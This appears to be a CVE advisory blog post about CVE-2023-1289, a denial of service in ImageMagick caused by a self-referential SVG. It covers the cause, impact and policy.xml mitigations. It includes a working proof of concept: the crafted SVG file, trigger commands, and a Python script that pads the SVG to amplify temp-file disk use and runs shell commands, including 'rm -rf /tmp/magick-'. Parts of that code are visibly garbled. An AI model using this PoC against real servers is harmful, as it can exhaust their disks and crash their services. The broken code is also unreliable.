ImageMagick, Denial of Service via Self-Referential SVG, CVE-2023-1289 (Medium)

Listen to this Post

The vulnerability, identified as CVE-2023-1289, resides in how ImageMagick handles SVG (Scalable Vector Graphics) files . Specifically, the issue is triggered when the software parses a specially crafted SVG file that contains an `` tag which references the file itself (a self-referential or recursive load) . This creates an infinite loop or uncontrolled recursion during the parsing process within the SVG coder. As the program attempts to process this self-referential structure, it leads to a segmentation fault, causing the application to crash. Prior to the crash, ImageMagick generates numerous temporary files in the `/tmp` directory. Researchers discovered that the size of these temporary “trash” files can be up to 103 times the size of the original malicious SVG file . Therefore, a relatively small uploaded file can quickly consume a significant amount of disk space, leading to a Denial of Service (DoS) condition. This is exacerbated by the fact that the crash itself generates these files, and the process can be repeated. The root cause is believed to be improper handling of file descriptors and a lack of recursion depth limits when processing external references within the SVG image .

DailyCVE Form:

Platform: Linux
Version: 6.9.11-60, 7.1.0-62
Vulnerability : Denial of Service
Severity: Medium
date: March 2023

Prediction: March 2023 (Patched in 7.1.1)

What Undercode Say:

Analytics

The vulnerability analysis reveals a critical resource management flaw. The segmentation fault does not prevent the prior generation of temporary files. The amplification factor of 103x was empirically derived, as demonstrated in the `dos_poc.py` script. This turns a minor file upload into a vector for rapid disk space exhaustion, impacting server stability and potentially containerized environments where disk limits are enforced.

Exploit:

The following bash commands and code snippets demonstrate the exploitability of CVE-2023-1289.

1. Create the malicious SVG file:

cat > bad.svg << 'EOF'
<!DOCTYPE test>

<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
<image height="200" width="200" xlink:href="bad.svg" />
</svg>

EOF

2. Verify the vulnerable version:

./magick --version
Output should show version 7.1.0-62 or 6.9.11-60

3. Trigger the Segmentation Fault and generate trash files:

./magick convert -verbose -font OpenSymbol bad.svg t.jpg
Observe the 'Segmentation fault' message
ls /tmp/magick-
List of generated trash files will be shown

4. Demonstrate the amplification effect (using Python):

dos_poc.py
import os
Create a 1MB SVG file with self-reference
with open("bad_dos.svg", "w") as f:
f.write('<?xml version="1.0"?>\n')
f.write('<!DOCTYPE test>\n')
f.write('<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">\n')
f.write('<image height="200" width="200" href="bad_dos.svg"' + "0"(10241021) + ' />\n')
f.write('</svg>')
os.system("rm -rf /tmp/magick-")
os.system("du -h bad_dos.svg")
os.system("../magick convert -font OpenSymbol bad_dos.svg t.jpg 2>/dev/null")
os.system("cat /tmp/magick- > dos_k.txt && du -h dos_k.txt")

Running this script will show a 1MB file generating 103MB of trash data.

Protection from this CVE

Protection involves updating ImageMagick or implementing policy-based mitigations.

Update ImageMagick: The primary solution is to upgrade to the patched version. The vulnerability is fixed in ImageMagick version 7.1.1-0 and later .

Example for Debian/Ubuntu
sudo apt-get update
sudo apt-get install imagemagick=8:7.1.1.43+dfsg1-1+deb13u2 Version may vary

Policy Configuration: If an immediate update is not possible, restrict or disable vulnerable SVG delegates using policy.xml.

<!-- Add or modify this line in /etc/ImageMagick-7/policy.xml -->
<policy domain="coder" rights="none" pattern="SVG" />
<policy domain="resource" name="disk" value="1GiB" />
<policy domain="resource" name="file" value="768" />

The first line disables the SVG coder entirely. The second and third lines set limits on disk consumption and open files to mitigate the DoS impact.
Input Validation: Implement strict file validation on the server-side before passing user-uploaded images to ImageMagick. Check file signatures and reject files that appear to be maliciously crafted SVGs.

Impact

Denial of Service: The primary impact is a Denial of Service (CVSS:3.0 Base Score 5.5, Medium) due to application crashes and disk space exhaustion . By repeatedly uploading the malicious SVG, an attacker can fill the `/tmp` partition, causing the system or web application to become unresponsive.
Resource Exhaustion: The 103x amplification factor means a 100 MB upload can generate over 10 GB of temporary files, quickly exhausting available disk space .
Container Escape / Host Disruption: If ImageMagick is running inside a Docker container, this attack can fill the container’s layered filesystem. This can lead to the container being killed and, in some configurations, cause disk space issues on the underlying Docker host, potentially disrupting all containers on that host .

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top